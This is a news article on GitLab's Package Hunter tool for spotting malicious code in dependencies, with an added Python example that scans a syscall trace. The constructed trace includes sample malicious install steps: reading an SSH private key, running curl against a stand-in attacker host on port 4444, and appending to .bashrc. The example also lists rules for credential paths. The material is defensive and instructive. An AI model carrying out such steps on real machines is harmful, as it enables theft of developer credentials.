
GitLab launches open source tool for detecting malicious code in dependencies – IT Pro – News

GitLab has released Package Hunter, a tool intended to discover malicious code in dependencies (the third-party libraries that developers add to their own code) before it can do any harm. The tool is open source and released for free.

Package Hunter installs the dependencies in a sandbox environment and monitors all system calls made by the dependencies during installation. If a suspicious call is among them, the user receives a notification so that they can take action. Currently Package Hunter supports NodeJS modules and Ruby Gems.
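To make the monitoring idea concrete, here is a small added illustration of the same approach: syscall-level events recorded while a package installs in a sandbox are checked against a handful of rules, and anything suspicious is reported. This is example code written for this article, not Package Hunter's own implementation (which relies on a different monitoring stack); the strace-style trace lines, the sandbox path `/tmp/install`, the allow-listed registry address `198.51.100.10` and the flagged address `203.0.113.7` are all constructed for the example.

```python
import re
from dataclasses import dataclass

# Assumptions for this example: the sandbox installs into INSTALL_ROOT, the only
# network peer an install should talk to is the registry mirror in ALLOWED_NET,
# and lifecycle scripts are expected to run only through these binaries.
INSTALL_ROOT = "/tmp/install"
ALLOWED_NET = {"198.51.100.10"}          # constructed registry mirror address
EXPECTED_BINARIES = {"/usr/bin/node", "/usr/bin/npm", "/bin/sh"}
SENSITIVE_PATHS = (
    re.compile(r"/\.ssh/"), re.compile(r"/\.aws/"),
    re.compile(r"^/etc/shadow$"), re.compile(r"/\.npmrc$"),
)

@dataclass
class Finding:
    pid: int
    rule: str
    detail: str

# One strace-style line: "<pid> <syscall>(<args>) = <ret>"
CALL_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<name>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>-?\d+)")
STR_RE = re.compile(r'"([^"]*)"')
ADDR_RE = re.compile(r'inet_addr\("([\d.]+)"\)')
PORT_RE = re.compile(r"htons\((\d+)\)")

def parse(line):
    """Split a trace line into (pid, syscall, raw args, return value), or None."""
    m = CALL_RE.match(line.strip())
    if not m:
        return None
    return int(m["pid"]), m["name"], m["args"], int(m["ret"])

def check_line(line):
    """Apply the detection rules to a single trace line.
    Failed calls are still reported: the attempt is what matters."""
    parsed = parse(line)
    if parsed is None:
        return []
    pid, name, args, _ret = parsed
    findings = []
    if name == "openat":
        strs = STR_RE.findall(args)
        if not strs:
            return []
        path = strs[0]
        writing = any(flag in args for flag in ("O_WRONLY", "O_RDWR", "O_CREAT", "O_APPEND"))
        if any(p.search(path) for p in SENSITIVE_PATHS):
            findings.append(Finding(pid, "sensitive_file_access", path))
        if writing and not path.startswith(INSTALL_ROOT + "/"):
            findings.append(Finding(pid, "write_outside_sandbox", path))
    elif name == "connect":
        addr, port = ADDR_RE.search(args), PORT_RE.search(args)
        if addr and addr.group(1) not in ALLOWED_NET:
            findings.append(Finding(pid, "unexpected_network",
                                    f"{addr.group(1)}:{port.group(1) if port else '?'}"))
    elif name == "execve":
        strs = STR_RE.findall(args)
        if strs and strs[0] not in EXPECTED_BINARIES:
            findings.append(Finding(pid, "unexpected_process", strs[0]))
    return findings

def scan(trace):
    """Run every rule over every line of a captured install trace."""
    return [f for line in trace.splitlines() for f in check_line(line)]

# Constructed trace of a sandboxed install: the first three lines are normal
# (read the manifest, fetch from the registry, run a lifecycle script via sh);
# the remaining lines are the behaviour a monitor should surface.
SAMPLE_TRACE = """
1234 openat(AT_FDCWD, "/tmp/install/node_modules/demo-pkg/package.json", O_RDONLY|O_CLOEXEC) = 3
1234 connect(5, {sa_family=AF_INET, sin_port=htons(443), sin_addr=inet_addr("198.51.100.10")}, 16) = 0
1235 execve("/bin/sh", ["sh", "-c", "node postinstall.js"], 0x1000 /* 12 vars */) = 0
1236 openat(AT_FDCWD, "/home/ci/.ssh/id_rsa", O_RDONLY) = 4
1236 execve("/usr/bin/curl", ["curl", "http://203.0.113.7:4444/"], 0x1000 /* 12 vars */) = 0
1237 connect(6, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("203.0.113.7")}, 16) = 0
1236 openat(AT_FDCWD, "/home/ci/.bashrc", O_WRONLY|O_APPEND) = 5
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_TRACE):
        print(f"pid {f.pid}: {f.rule} -> {f.detail}")
```

The rules are deliberately allow-list based: an install is expected to read its own tree, talk to one registry and spawn a known interpreter, so anything else is worth a notification. Running the block reports four findings for the constructed trace (a credential read, an unexpected process, an unexpected network peer and a write outside the sandbox) while the three benign lines pass silently.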

GitLab developed Package Hunter partly because it hopes that this will give developers more confidence in using public libraries. It is easy to reuse public libraries and add new functions, but there is a risk that bugs or malicious code will be added to their software via these dependencies.

Research from 2020 shows that open source packages are regularly abused for supply chain attacks. For example, malicious code was added last year to the popular package event-stream. Earlier this year, researcher Alex Birsan published how he could use dependencies to penetrate the likes of Apple and Microsoft.

GitLab has been testing Package Hunter since November last year and has now released the tool as free and open source software. In this way, GitLab hopes developers will continue to contribute to the project and report bugs. Package Hunter can handle any project that adds the GitLab CI template.

